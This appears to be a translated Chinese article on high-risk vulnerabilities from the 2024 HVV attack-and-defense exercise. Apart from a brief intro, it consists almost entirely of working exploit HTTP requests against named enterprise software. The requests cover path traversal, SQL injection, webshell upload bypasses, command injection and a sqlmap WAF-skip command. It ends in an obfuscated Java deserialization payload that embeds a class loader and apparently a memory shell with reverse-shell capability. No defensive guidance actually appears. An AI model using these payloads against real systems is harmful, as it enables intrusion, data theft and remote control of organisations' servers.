Friends, the annual HVV (护网) attack-and-defense exercise is about to start. How much has your skill improved? Are you daydreaming again about which enterprise you will break through? Then let the blue-team engineers have a taste of your new "signature moves".
In last year's HVV campaign, attackers showed an unprecedented level of technical coordination: privilege escapes out of cloud-native architectures, AI-generated phishing code obfuscated to slip past detection, and precisely targeted supply-chain poisoning. Network security defenses are being torn open along several dimensions at once.
Drawing on real-world cases, this article breaks down the ten high-risk vulnerabilities that appeared most often in the 2024 HVV campaign, shows how criminal groups weaponized them into complete attack chains, and offers key decision points for enterprises' day-to-day defense. Before the next round begins, is your security baseline where it needs to be?
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host:
Accept:application/json,text/javascript,*/*;q=0.01
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Requested-With:XMLHttpRequest
Content-Length: 395
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="method"
replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51-
POST /resource/help/km/review/dataxml.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Cmd: echo stctest
s_bean=ruleFormulaValidate&script=u0020u0020u0020u0020u0062u006fu006fu006cu006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&modelNa
me=test
POST /CDGServer3/NoticeAjax;Service HTTP/1.1
Host:
Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917;
JSESSIONID=06DCD58EDC037F785605A29CD7425C66
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/124.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
command=delNotice&noticeId=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR
DELAY '0:0: 3' --
GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
GET /BaseModule/SysLog/ReadTxtLog?FileName=../web.config HTTP/1.1
Host:
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie:
__RequestVerificationToken=EXiOGTuudShJEzYLR8AQgWCZbF2NB6_KXKrmqJJyp1cgyV6_LYy9yKQhNkHJ
GXXlbO_6NLQZPwUUdVZKH6e9KMuXyxV6Tg-w5Ftx-mKih3U1;
ASP.NET_SessionId=2ofwed0gd2jc4paj0an0hpcl
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101
Firefox/128.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,i
mage/svg+xml,*/*;q=0.8
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050
FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as
nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101
Firefox/117.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: GOASESSID=i589f58naalabocmbidup7edl3
Upgrade-Insecure-Requests: 1
GET /edu_security_officer/disable;downloadLogger.action?
ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/93.0.4577.63 Safari/537.36
Connection: close
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
GET /index.php?
entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+
&type=c&response=accept HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15
(KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host:
Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917;
JSESSIONID=06DCD58EDC037F785605A29CD7425C66
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/124.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR
DELAY '0:0:5'-
GET /ecp/productonsale/querygoodsgridbycode.json?
code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%
7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%
3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCH
R%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/125.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: no-cache
POST /api/uploader/uploadImage HTTP/1.1
Host: xx.xx.xx.xx
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m
x-requested-with: XMLHttpRequest
------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="1G3311040N.php"
Content-Type: image/gif
------WebKitFormBoundaryLZbmKeasWgo2gPtU--
Inspur Cloud Financial System (浪潮云财务系统) paths
/cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx
/cwbase/service/rps/xtdysrv.asmx
POST /InputServlet?action=12 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 241
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="upsize"
1024
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="/..\..\..2211.jsp"
Content-Type: image/jpeg
123
--00content0boundary00--
app="启明星辰-天玥网络安全审计"
python3 sqlmap.py -r test.txt --batch --skip-waf --random-agent --dbs --force-ssl
POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
checkname=123&tagid=123 AND 8475=(SELECT 8475 FROM PG_SLEEP(5))-- BAUh
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: multipart/form-data; boundary=skdHHhNHjhnUgerSexsksboundary
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML,
like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="type"
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="extensions"
png--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="applicationCategory"
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="destDirectory"
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="destFilename"
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="maxSize"
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="isEncrypt"
false
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="file1"; filename="1.png"
Content-Type: Content-Type: application/pdf
<% out.println("hello test");%>
--skdHHhNHjhnUgerSexsksboundary--
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1;
.NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
method=uploadMenuIcon&fileid=id值&filename=testqqww.jsp
/seeyon/main/menuIcon/a123.jsp
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>1.txt`HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101
Firefox/121.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2
Upgrade-Insecure-Requests: 1
GET /api/client/audiobroadcast/1.txt HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101
Firefox/121.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2
Upgrade-Insecure-Requests: 1
POST /app/ext/ajax_users.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(123456),0x7e),NULL,NULL,NULL--
/safety/ping.htm
/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1
POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1
Host: {hostname}
Cmd: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15
(KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 16284
{{unquote("xacxedx00x05srx00x11java.util.HashSetxbaDx85x95x96xb8xb74x03x0
0x00xpwx0cx00x00x00x02?
@x00x00x00x00x00x01srx004org.apache.commons.collections.keyvalue.TiedMapEntryx8
axadxd2x9b9xc1x1fxdbx02x00x02Lx00x03keytx00x12Ljava/lang/Object;Lx00x03m
aptx00x0fLjava/util/Map;xptx00x03foosrx00*org.apache.commons.collections.map.LazyM
apnxe5x94x82x9eyx10x94x03x00x01Lx00x07factorytx00,Lorg/apache/commons/colle
ctions/Transformer;xpsrx00:org.apache.commons.collections.functors.ChainedTransformer0
xc7x97xecx28zx97x04x02x00x01[x00x0diTransformerstx00
[Lorg/apache/commons/collections/Transformer;xpurx00
[Lorg.apache.commons.collections.Transformer;xbdV*xf1xd84x18x99x02x00x00xpx00
x00x00x04srx00;org.apache.commons.collections.functors.ConstantTransformerXvx90x11
Ax02xb1x94x02x00x01Lx00x09iConstantqx00~x00x03xpvrx00
javax.script.ScriptEngineManagerx00x00x00x00x00x00x00x00x00x00x00xpsrx00:or
g.apache.commons.collections.functors.InvokerTransformerx87xe8xffkx7b|xce8x02x00
x03[x00x05iArgstx00x13[Ljava/lang/Object;Lx00x0biMethodNametx00x12Ljava/lang/S
tring;
[x00x0biParamTypestx00x12[Ljava/lang/Class;xpurx00x13[Ljava.lang.Object;x90xceX
x9fx10sx29lx02x00x00xpx00x00x00x00tx00x0bnewInstanceurx00x12[Ljava.lang.C
lass;xabx16xd7xaexcbxcdZx99x02x00x00xpx00x00x00x00sqx00~x00x13uqx00~
x00x18x00x00x00x01tx00x02jstx00x0fgetEngineByNameuqx00~x00x1bx00x00x00x
01vrx00x10java.lang.Stringxa0xf0xa48z;xb3Bx02x00x00xpsqx00~x00x13uqx00~x0
0x18x00x00x00x01t45try x7bx0a
loadx28"nashorn:mozilla_compat.js"x29;x0ax7d catch x28ex29
x7bx7dx0afunction getUnsafex28x29x7bx0a var theUnsafeMethod =
java.lang.Class.forNamex28"sun.misc.Unsafe"x29.getDeclaredFieldx28"theUnsafe"x2
9;x0a theUnsafeMethod.setAccessiblex28truex29; x0a return
theUnsafeMethod.getx28nullx29;x0ax7dx0afunction
removeClassCachex28clazzx29x7bx0a var unsafe = getUnsafex28x29;x0a var
clazzAnonymousClass =
unsafe.defineAnonymousClassx28clazz,java.lang.Class.forNamex28"java.lang.Class"x29
.getResourceAsStreamx28"Class.class"x29.readAllBytesx28x29,nullx29;x0a var
reflectionDataField =
clazzAnonymousClass.getDeclaredFieldx28"reflectionData"x29;x0a
unsafe.putObjectx28clazz,unsafe.objectFieldOffsetx28reflectionDataFieldx29,nullx29;
x0ax7dx0afunction bypassReflectionFilterx28x29 x7bx0a var reflectionClass;x0a
try x7bx0a reflectionClass =
java.lang.Class.forNamex28"jdk.internal.reflect.Reflection"x29;x0a x7d catch
x28errorx29 x7bx0a reflectionClass =
java.lang.Class.forNamex28"sun.reflect.Reflection"x29;x0a x7dx0a var unsafe =
getUnsafex28x29;x0a var classBuffer =
reflectionClass.getResourceAsStreamx28"Reflection.class"x29.readAllBytesx28x29;x
0a var reflectionAnonymousClass = unsafe.defineAnonymousClassx28reflectionClass,
classBuffer, nullx29;x0a var fieldFilterMapField =
reflectionAnonymousClass.getDeclaredFieldx28"fieldFilterMap"x29;x0a var
methodFilterMapField =
reflectionAnonymousClass.getDeclaredFieldx28"methodFilterMap"x29;x0a if
x28fieldFilterMapField.getTypex28x29.isAssignableFromx28java.lang.Class.forNamex28
"java.util.HashMap"x29x29x29 x7bx0a unsafe.putObjectx28reflectionClass,
unsafe.staticFieldOffsetx28fieldFilterMapFieldx29,
java.lang.Class.forNamex28"java.util.HashMap"x29.getConstructorx28x29.newInstance
x28x29x29;x0a x7dx0a if
x28methodFilterMapField.getTypex28x29.isAssignableFromx28java.lang.Class.forNamex2
8"java.util.HashMap"x29x29x29 x7bx0a unsafe.putObjectx28reflectionClass,
unsafe.staticFieldOffsetx28methodFilterMapFieldx29,
java.lang.Class.forNamex28"java.util.HashMap"x29.getConstructorx28x29.newInstance
x28x29x29;x0a x7dx0a
removeClassCachex28java.lang.Class.forNamex28"java.lang.Class"x29x29;x0ax7dx0a
function setAccessiblex28accessibleObjectx29x7bx0a var unsafe =
getUnsafex28x29;x0a var overrideField =
java.lang.Class.forNamex28"java.lang.reflect.AccessibleObject"x29.getDeclaredField
x28"override"x29;x0a var offset =
unsafe.objectFieldOffsetx28overrideFieldx29;x0a
unsafe.putBooleanx28accessibleObject, offset, truex29;x0ax7dx0afunction
defineClassx28bytesx29x7bx0a var clz = null;x0a var version =
java.lang.System.getPropertyx28"java.version"x29;x0a var unsafe =
getUnsafex28x29;x0a var classLoader = new
java.net.URLClassLoaderx28java.lang.reflect.Array.newInstancex28java.lang.Class.forNa
mex28"java.net.URL"x29, 0x29x29;x0a tryx7bx0a if
x28version.splitx28"."x29[0] >= 11x29 x7bx0a
bypassReflectionFilterx28x29;x0a defineClassMethod =
java.lang.Class.forNamex28"java.lang.ClassLoader"x29.getDeclaredMethodx28"defineC
lass", java.lang.Class.forNamex28"[B"x29,java.lang.Integer.TYPE,
java.lang.Integer.TYPEx29;x0a setAccessiblex28defineClassMethodx29;x0a //
xe7xbbx95xe8xbfx87 setAccessible x0a clz =
defineClassMethod.invokex28classLoader, bytes, 0, bytes.lengthx29;x0a
x7delsex7bx0a var protectionDomain = new java.security.ProtectionDomainx28new
java.security.CodeSourcex28null,
java.lang.reflect.Array.newInstancex28java.lang.Class.forNamex28"java.security.cert.
Certificate"x29, 0x29x29, null, classLoader, []x29;x0a clz =
unsafe.defineClassx28null, bytes, 0, bytes.length, classLoader,
protectionDomainx29;x0a x7dx0a x7dcatchx28errorx29x7bx0a
error.printStackTracex28x29;x0a x7dfinallyx7bx0a return clz;x0a
x7dx0ax7dx0afunction base64DecodeToBytex28strx29 x7bx0a var bt;x0a
tryx7bx0a bt =
java.lang.Class.forNamex28"sun.misc.BASE64Decoder"x29.newInstancex28x29.decodeBuf
ferx28strx29;x0a x7dcatchx28ex29x7bx7dx0a if x28bt == nullx29x7bx0a
tryx7bx0a bt =
java.lang.Class.forNamex28"java.util.Base64"x29.newInstancex28x29.getDecoderx28
x29.decodex28strx29;x0a x7dcatchx28ex29x7bx7dx0a x7dx0a ifx28bt ==
nullx29x7bx0a tryx7bx0a bt =
java.util.Base64.getDecoderx28x29.decodex28strx29;x0a
x7dcatchx28ex29x7bx7dx0a x7dx0a if x28bt == nullx29x7bx0a bt =
java.lang.Class.forNamex28"org.apache.commons.codec.binary.Base64"x29.newInstancex
28x29.decodex28strx29;x0a x7dx0a return bt;x0ax7dx0avar
code="yv66vgAAADEBmgoAHgCtCgBDAK4KAEMArwoAHgCwCACxCgAcALIKALMAtAoAswC1BwC2CgBDALcIAKUK
ACEAuAgAuQgAugcAuwgAvAgAvQcAvgoAHAC/CADACADBBwDCCwAWAMMLAMQAxQsAxADGCADHCADIBwDJCgAcAMo
HAMsKAMwAzQgAzgcAzwgA0AoAjwDRCgAhANIIANMJANQA1QoA1ADWCADXCgCPANgKABwA2QgA2gcA2woAHADcCA
DdBwDeCADfCADgCgAcAOEHAOIKAEMA4woA5ADYCADlCgAhAOYIAOcKACEA6AgA6QoAIQDqCgCPAOsIAOwKACEA7
QgA7gkAjwDvCgDUAPAJAI8A8QcA8goAQwDzCgBDAPQIAKYIAPUIAPYKAI8A9wgA+AoAjwD5BwD6CgBMAPsHAPwK
AE4A/QoAjwD+CgBOAP8KAE4BAAoATgEBCgAvAQIKAEwBAwoAIQEECAEFCgEGAQcKACEBCAgBCQgBCggBCwcBDAo
AXQCtCgBdAQ0IAQ4KAF0BAggBDwgBEAgBEQgBEgoBEwEUCgETARUHARYKARcBGAoAaAEZCAEaCgBoARsKAGgAxQ
oAaAEcCgEXAR0KARcBHggBHwgBIAoBEwEhBwEiCgB0ASMKAHQBGAoBFwEkCgB0ASQKAHQBJQoBJgEnCgEmASgKA
SkBKgoBKQEABQAAAAAAAAAyCgBDASsKARcBLAoAdAEBCAEtCgAvAS4IAS8IATAKANQBMQoAjwEyCAEzCAE0CAE1
CAE2CACpCAE3BwE4AQAMQkFTRTY0X0NIQVJTAQASTGphdmEvbGFuZy9TdHJpbmc7AQANQ29uc3RhbnRWYWx1ZQg
BOQEAAmlwAQAEcG9ydAEAE0xqYXZhL2xhbmcvSW50ZWdlcjsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU
51bWJlclRhYmxlAQAKRXhjZXB0aW9ucwEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvb
GFuZy9DbGFzczsBAAlTaWduYXR1cmUBACgoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M8Kj47
AQAFcHJveHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEABXdyaXRlAQA4KExqYXZ
hL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAApjbGVhclBhcmFtAQ
AEZXhlYwEAB3JldmVyc2UBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9sYW5nL1N0cmluZzsBAANydW4BA
AZkZWNvZGUBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAKU291cmNlRmlsZQEAB0E0LmphdmEMAJcAmAwBOgE7
DAE8AT0MAT4BPwEAB3RocmVhZHMMAUABQQcBQgwBQwFEDAFFAUYBABNbTGphdmEvbGFuZy9UaHJlYWQ7DAFHAUg
MAUkBSgEABGh0dHABAAZ0YXJnZXQBABJqYXZhL2xhbmcvUnVubmFibGUBAAZ0aGlzJDABAAdoYW5kbGVyAQAeam
F2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAFLAT8BAAZnbG9iYWwBAApwcm9jZXNzb3JzAQAOamF2YS91d
GlsL0xpc3QMAUwBTQcBTgwBTwFQDAFRAVIBAANyZXEBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwB
UwFUAQAQamF2YS9sYW5nL09iamVjdAcBVQwBVgFXAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2N
tZAwAoAChDAFYAVkBAAlzZXRTdGF0dXMHAVoMAVsBXAwBXQFeAQAkb3JnLmFwYWNoZS50b21jYXQudXRpbC5idW
YuQnl0ZUNodW5rDACcAJ0MAV8BUgEACHNldEJ5dGVzAQACW0IMAWABVAEAB2RvV3JpdGUBABNqYXZhL2xhbmcvR
XhjZXB0aW9uAQATamF2YS5uaW8uQnl0ZUJ1ZmZlcgEABHdyYXAMAWEAnQEAIGphdmEvbGFuZy9DbGFzc05vdEZv
dW5kRXhjZXB0aW9uDAFiAWMHAWQBAAAMAWUBZgEAEGNvbW1hbmQgbm90IG51bGwMAWcBSAEABSMjIyMjDAFoAWk
MAKQAoQEAAToMAWoBawEAImNvbW1hbmQgcmV2ZXJzZSBob3N0IGZvcm1hdCBlcnJvciEMAJQAkQwBbAFtDACVAJ
YBABBqYXZhL2xhbmcvVGhyZWFkDACXAW4MAW8AmAEABSQkJCQkAQASZmlsZSBmb3JtYXQgZXJyb3IhDACiAKMBA
AVAQEBAQAwApQChAQAMamF2YS9pby9GaWxlDACXAXABABhqYXZhL2lvL0ZpbGVPdXRwdXRTdHJlYW0MAJcBcQwA
qQCqDACiAXIMAXMAmAwBdACYDAF1AUgMAXYBSAwBdwF4AQAHb3MubmFtZQcBeQwBegChDAF7AUgBAAN3aW4BAAR
waW5nAQACLW4BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwBfAF9AQAFIC1uIDQBAAIvYwEABSAtdCA0AQACc2
gBAAItYwcBfgwBfwGADAClAYEBABFqYXZhL3V0aWwvU2Nhbm5lcgcBggwBgwGEDACXAYUBAAJcYQwBhgGHDAFRA
UgMAYgBhAwBiQCYAQAHL2Jpbi9zaAEAB2NtZC5leGUMAKUBigEAD2phdmEvbmV0L1NvY2tldAwAlwGLDAGMAY0M
AY4BUAcBjwwBkAGRDAGSAZEHAZMMAKIBlAwBlQGWDAGXAZEBAB1yZXZlcnNlIGV4ZWN1dGUgZXJyb3IsIG1zZyA
tPgwBmAFIAQABIQEAE3JldmVyc2UgZXhlY3V0ZSBvayEMAZkBkQwApgCnAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2
RlcgEADGRlY29kZUJ1ZmZlcgEAEGphdmEudXRpbC5CYXNlNjQBAApnZXREZWNvZGVyAQAmb3JnLmFwYWNoZS5jb
21tb25zLmNvZGVjLmJpbmFyeS5CYXNlNjQBAAJBNAEAQEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVm
Z2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8BAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1R
ocmVhZDsBAA5nZXRUaHJlYWRHcm91cAEAGSgpTGphdmEvbGFuZy9UaHJlYWRHcm91cDsBAAhnZXRDbGFzcwEAEy
gpTGphdmEvbGFuZy9DbGFzczsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2Y
S9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAA1zZXRBY2Nlc3NpYmxlAQAE
KFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHZ2V0TmFtZQEAFCg
pTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAA1nZX
RTdXBlcmNsYXNzAQAIaXRlcmF0b3IBABYoKUxqYXZhL3V0aWwvSXRlcmF0b3I7AQASamF2YS91dGlsL0l0ZXJhd
G9yAQAHaGFzTmV4dAEAAygpWgEABG5leHQBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldE1ldGhvZAEAQChM
amF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABh
qYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbm
cvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAhnZXRCeXRlcwEABCgpW0IBABFqYXZhL2xhbmcvSW50ZWdlc
gEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQAL
bmV3SW5zdGFuY2UBABFnZXREZWNsYXJlZE1ldGhvZAEAB2Zvck5hbWUBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXI
BABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAGZXF1YWxzAQAVKE
